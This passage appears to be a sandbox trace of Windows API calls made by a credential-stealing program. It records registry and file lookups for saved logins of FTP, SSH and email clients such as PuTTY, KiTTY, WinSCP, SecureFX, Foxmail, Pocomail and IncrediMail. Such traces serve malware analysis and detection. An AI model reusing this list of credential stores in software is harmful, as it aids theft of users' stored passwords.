param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 55 [0184.418] GetProcessHeap () returned 0x840000 [0184.418] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x860f18 [0184.418] GetProcessHeap () returned 0x840000 [0184.418] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.419] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 0 [0184.419] GetProcessHeap () returned 0x840000 [0184.419] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860f18 | out: hHeap=0x840000) returned 1 [0184.419] GetProcessHeap () returned 0x840000 [0184.419] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0184.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.421] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\VanDyke\\SecureFX", pszValue="Config Path", pdwType=0x0, pvData=0x873a58, pcbData=0x19f850*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f850*=0x104) returned 0x2 [0184.421] GetProcessHeap () returned 0x840000 [0184.421] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.421] GetProcessHeap () returned 0x840000 [0184.421] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.422] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.422] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0184.422] GetProcessHeap () returned 0x840000 [0184.422] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0184.423] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.424] wvsprintfW (in: param_1=0x875288, param_2="%s\\Odin Secure FTP Expert\\QFDefault.QFQ", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 59 [0184.424] GetProcessHeap () returned 0x840000 [0184.424] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x871d98 [0184.424] GetProcessHeap () returned 0x840000 [0184.424] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.425] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 0 [0184.425] GetProcessHeap () returned 0x840000 [0184.425] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0184.425] GetProcessHeap () returned 0x840000 [0184.425] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.425] GetProcessHeap () returned 0x840000 [0184.431] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.432] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.433] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0184.433] GetProcessHeap () returned 0x840000 [0184.433] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8c) returned 0x875288 [0184.434] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.435] wvsprintfW (in: param_1=0x875288, param_2="%s\\Odin Secure FTP Expert\\SiteInfo.QFP", arglist=0x19f83c | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 58 [0184.435] GetProcessHeap () returned 0x840000 [0184.435] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x78) returned 0x861698 [0184.435] GetProcessHeap () returned 0x840000 [0184.435] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.436] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 0 [0184.436] GetProcessHeap () returned 0x840000 [0184.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861698 | out: hHeap=0x840000) returned 1 [0184.436] GetProcessHeap () returned 0x840000 [0184.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.437] GetProcessHeap () returned 0x840000 [0184.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0184.437] GetProcessHeap () returned 0x840000 [0184.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872058 [0184.437] GetProcessHeap () returned 0x840000 [0184.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c38 [0184.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.439] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x871c38 | out: phkResult=0x871c38*=0x0) returned 0x2 [0184.439] GetProcessHeap () returned 0x840000 [0184.439] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c38 | out: hHeap=0x840000) returned 1 [0184.439] GetProcessHeap () returned 0x840000 [0184.439] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0184.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.441] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x871ca8 | out: phkResult=0x871ca8*=0x0) returned 0x2 [0184.442] GetProcessHeap () returned 0x840000 [0184.442] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0184.442] GetProcessHeap () returned 0x840000 [0184.442] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.448] GetProcessHeap () returned 0x840000 [0184.448] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872058 | out: hHeap=0x840000) returned 1 [0184.449] GetProcessHeap () returned 0x840000 [0184.449] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0184.449] GetProcessHeap () returned 0x840000 [0184.449] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872058 [0184.449] GetProcessHeap () returned 0x840000 [0184.449] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0184.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.451] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x871be8 | out: phkResult=0x871be8*=0x0) returned 0x2 [0184.451] GetProcessHeap () returned 0x840000 [0184.451] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0184.451] GetProcessHeap () returned 0x840000 [0184.451] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0184.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.453] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x871b08 | out: phkResult=0x871b08*=0x0) returned 0x2 [0184.453] GetProcessHeap () returned 0x840000 [0184.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0184.453] GetProcessHeap () returned 0x840000 [0184.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.453] GetProcessHeap () returned 0x840000 [0184.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872058 | out: hHeap=0x840000) returned 1 [0184.453] GetProcessHeap () returned 0x840000 [0184.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0184.454] GetProcessHeap () returned 0x840000 [0184.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x871ff8 [0184.454] GetProcessHeap () returned 0x840000 [0184.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0184.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.455] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x871bc8 | out: phkResult=0x871bc8*=0x0) returned 0x2 [0184.455] GetProcessHeap () returned 0x840000 [0184.455] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0184.455] GetProcessHeap () returned 0x840000 [0184.455] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0184.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.824] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x871b08 | out: phkResult=0x871b08*=0x0) returned 0x2 [0184.824] GetProcessHeap () returned 0x840000 [0184.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0184.824] GetProcessHeap () returned 0x840000 [0184.824] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0184.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.825] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x871b28 | out: phkResult=0x871b28*=0x0) returned 0x2 [0184.825] GetProcessHeap () returned 0x840000 [0184.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0184.825] GetProcessHeap () returned 0x840000 [0184.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0184.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.827] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x871b58 | out: phkResult=0x871b58*=0x0) returned 0x2 [0184.827] GetProcessHeap () returned 0x840000 [0184.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0184.827] GetProcessHeap () returned 0x840000 [0184.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.827] GetProcessHeap () returned 0x840000 [0184.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ff8 | out: hHeap=0x840000) returned 1 [0184.827] GetProcessHeap () returned 0x840000 [0184.827] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0184.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.828] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Thunderbird", pszValue="CurrentVersion", pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104) returned 0x2 [0184.828] GetProcessHeap () returned 0x840000 [0184.828] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.828] GetProcessHeap () returned 0x840000 [0184.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x875288 [0184.829] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.830] wvsprintfW (in: param_1=0x875288, param_2="%s\\Foxmail\\mail", arglist=0x19f860 | out: param_1="C:\\Program Files (x86)\\Foxmail\\mail") returned 35 [0184.830] GetProcessHeap () returned 0x840000 [0184.830] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4a) returned 0x861da0 [0184.830] GetProcessHeap () returned 0x840000 [0184.830] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.858] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Foxmail\\mail") returned 0 [0184.858] GetProcessHeap () returned 0x840000 [0184.858] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861da0 | out: hHeap=0x840000) returned 1 [0184.858] GetProcessHeap () returned 0x840000 [0184.858] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.858] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x873a58, nSize=0x104 | out: lpDst="C:") returned 0x3 [0184.859] Sleep (dwMilliseconds=0xa) [0184.876] GetProcessHeap () returned 0x840000 [0184.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x875288 [0184.877] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.878] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s", arglist=0x19f5e0 | out: param_1="C:\\Foxmail*") returned 11 [0184.878] GetProcessHeap () returned 0x840000 [0184.878] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1a) returned 0x871498 [0184.878] GetProcessHeap () returned 0x840000 [0184.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.884] FindFirstFileW (in: lpFileName="C:\\Foxmail*", lpFindFileData=0x19f5f4 | out: lpFindFileData=0x19f5f4*(dwFileAttributes=0x560055, ftCreationTime.dwLowDateTime=0x580057, ftCreationTime.dwHighDateTime=0x5a0059, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x640063, ftLastWriteTime.dwHighDateTime=0x660065, nFileSizeHigh=0x680067, nFileSizeLow=0x6a0069, dwReserved0=0x6c006b, dwReserved1=0x6e006d, cFileName="opqr\x08", cAlternateFileName="㩘\x87Ą")) returned 0xffffffff [0184.885] GetProcessHeap () returned 0x840000 [0184.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0184.885] GetProcessHeap () returned 0x840000 [0184.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.885] GetProcessHeap () returned 0x840000 [0184.885] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f70) returned 0x875288 [0184.886] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.887] wvsprintfW (in: param_1=0x875288, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19f804 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 59 [0184.887] GetProcessHeap () returned 0x840000 [0184.887] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x871d98 [0184.887] GetProcessHeap () returned 0x840000 [0184.887] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.888] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 0 [0184.888] GetProcessHeap () returned 0x840000 [0184.888] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0184.888] GetProcessHeap () returned 0x840000 [0184.888] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.889] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.891] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0184.891] GetProcessHeap () returned 0x840000 [0184.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f70) returned 0x875288 [0184.892] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.893] wvsprintfW (in: param_1=0x875288, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19f7f8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 53 [0184.893] GetProcessHeap () returned 0x840000 [0184.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6e) returned 0x871d98 [0184.893] GetProcessHeap () returned 0x840000 [0184.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.894] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 0 [0184.894] GetProcessHeap () returned 0x840000 [0184.894] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0184.894] GetProcessHeap () returned 0x840000 [0184.894] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.894] GetProcessHeap () returned 0x840000 [0184.894] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0184.894] GetProcessHeap () returned 0x840000 [0184.894] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872118 [0184.894] GetProcessHeap () returned 0x840000 [0184.894] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0184.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.900] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x871b08 | out: phkResult=0x871b08*=0x0) returned 0x2 [0184.900] GetProcessHeap () returned 0x840000 [0184.900] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0184.901] GetProcessHeap () returned 0x840000 [0184.901] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bf8 [0184.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.902] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x871bf8 | out: phkResult=0x871bf8*=0x0) returned 0x2 [0184.902] GetProcessHeap () returned 0x840000 [0184.902] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bf8 | out: hHeap=0x840000) returned 1 [0184.902] GetProcessHeap () returned 0x840000 [0184.902] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.902] GetProcessHeap () returned 0x840000 [0184.902] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872118 | out: hHeap=0x840000) returned 1 [0184.902] GetProcessHeap () returned 0x840000 [0184.902] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x875288 [0184.903] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.904] wvsprintfW (in: param_1=0x875288, param_2="%s\\GmailNotifierPro\\ConfigData.xml", arglist=0x19f7f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 69 [0184.904] GetProcessHeap () returned 0x840000 [0184.904] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8e) returned 0x874768 [0184.904] GetProcessHeap () returned 0x840000 [0184.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.905] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 0 [0184.905] GetProcessHeap () returned 0x840000 [0184.905] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874768 | out: hHeap=0x840000) returned 1 [0184.905] GetProcessHeap () returned 0x840000 [0184.905] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.906] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.906] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0184.906] GetProcessHeap () returned 0x840000 [0184.906] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6a) returned 0x875288 [0184.907] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.909] wvsprintfW (in: param_1=0x875288, param_2="%s\\DeskSoft\\CheckMail", arglist=0x19f7e4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 56 [0184.909] GetProcessHeap () returned 0x840000 [0184.909] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x74) returned 0x861898 [0184.909] GetProcessHeap () returned 0x840000 [0184.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.910] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 0 [0184.912] GetProcessHeap () returned 0x840000 [0184.912] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.912] GetProcessHeap () returned 0x840000 [0184.912] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861898 | out: hHeap=0x840000) returned 1 [0184.912] GetProcessHeap () returned 0x840000 [0184.912] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.913] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.913] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0184.913] GetProcessHeap () returned 0x840000 [0184.913] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f7c) returned 0x875288 [0184.914] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.923] wvsprintfW (in: param_1=0x875288, param_2="%s\\WinFtp Client\\Favorites.dat", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 50 [0184.923] GetProcessHeap () returned 0x840000 [0184.923] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x68) returned 0x871d98 [0184.923] GetProcessHeap () returned 0x840000 [0184.923] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.924] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 0 [0184.924] GetProcessHeap () returned 0x840000 [0184.924] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0184.924] GetProcessHeap () returned 0x840000 [0184.924] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.924] GetProcessHeap () returned 0x840000 [0184.925] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0184.925] GetProcessHeap () returned 0x840000 [0184.925] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872010 [0184.925] GetProcessHeap () returned 0x840000 [0184.925] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0184.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.926] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x871b08 | out: phkResult=0x871b08*=0x0) returned 0x2 [0184.926] GetProcessHeap () returned 0x840000 [0184.926] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0184.926] GetProcessHeap () returned 0x840000 [0184.927] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0184.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.932] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x871ca8 | out: phkResult=0x871ca8*=0x0) returned 0x2 [0184.932] GetProcessHeap () returned 0x840000 [0184.933] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0184.933] GetProcessHeap () returned 0x840000 [0184.933] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.933] GetProcessHeap () returned 0x840000 [0184.933] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872010 | out: hHeap=0x840000) returned 1 [0184.933] GetProcessHeap () returned 0x840000 [0184.933] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.933] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.934] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Windows") returned 0x0 [0184.934] GetProcessHeap () returned 0x840000 [0184.934] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x875288 [0184.934] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.935] wvsprintfW (in: param_1=0x875288, param_2="%s\\32BitFtp.TMP", arglist=0x19f848 | out: param_1="C:\\Windows\\32BitFtp.TMP") returned 23 [0184.935] GetProcessHeap () returned 0x840000 [0184.935] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x32) returned 0x866cf0 [0184.935] GetProcessHeap () returned 0x840000 [0184.935] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.936] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.TMP") returned 0 [0184.936] GetProcessHeap () returned 0x840000 [0184.936] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x866cf0 | out: hHeap=0x840000) returned 1 [0184.936] GetProcessHeap () returned 0x840000 [0184.937] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.937] GetProcessHeap () returned 0x840000 [0184.937] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.937] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.938] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Windows") returned 0x0 [0184.938] GetProcessHeap () returned 0x840000 [0184.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x875288 [0184.938] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.939] wvsprintfW (in: param_1=0x875288, param_2="%s\\32BitFtp.ini", arglist=0x19f83c | out: param_1="C:\\Windows\\32BitFtp.ini") returned 23 [0184.939] GetProcessHeap () returned 0x840000 [0184.939] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x32) returned 0x866db0 [0184.939] GetProcessHeap () returned 0x840000 [0184.939] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.940] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.ini") returned 0 [0184.940] GetProcessHeap () returned 0x840000 [0184.940] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x866db0 | out: hHeap=0x840000) returned 1 [0184.940] GetProcessHeap () returned 0x840000 